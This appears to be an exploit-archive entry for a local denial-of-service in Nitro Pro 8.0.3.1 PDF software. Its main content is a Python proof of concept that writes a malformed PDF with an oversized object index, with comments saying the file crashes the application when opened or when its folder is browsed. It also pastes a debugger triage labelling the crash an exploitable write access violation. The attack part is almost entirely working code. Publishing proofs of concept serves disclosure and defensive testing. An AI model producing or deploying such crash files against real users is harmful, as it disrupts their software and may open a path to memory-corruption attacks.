Nitro Pro 8.0.3.1 DoS

2013.03.17

Credit: John Cobb

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#!C:\Python27\python.exe
# Exploit Title: Nitro Pro 8.0.3.1 - DoS
# Date: 2012-10-07
# Exploit Author: John Cobb
# Author Homepage: www.NoBytes.com
# Vendor Homepage: www.nitropdf.com
# Version: 8.0.3.1
# Tested on: Win7 64bit
# CVE : None
# When the Object Index exceeds 10 characters the app crashes:
#
# !exploitable
# BUG_TITLE:Exploitable - User Mode Write AV starting at npdf!ProvideCoreHFT+0x000000000010886a (Hash=0x265b4f1d.0x020d4f2c)
# EXPLANATION:User mode write access violations that are not near NULL are exploitable.
#
# Bonus: App crashes when just browsing the folder which contains the PDF...
#
sPDFHeader = "\x25\x50\x44\x46\x2D\x31\x2E\x32\x0D"
sPDFComment = "\x25\xE2\xE3\xCF\xD3\x0A"
sPDFObjectIndex = "\x31" * 11 # The Crash
sPDFObject = "\x20\x30\x20\x6F\x62\x6A"
payload = sPDFHeader + sPDFComment + sPDFObjectIndex + sPDFObject
f = open("exploit.pdf", 'w')
f.write(payload)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Nitro Pro 8.0.3.1 DoS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.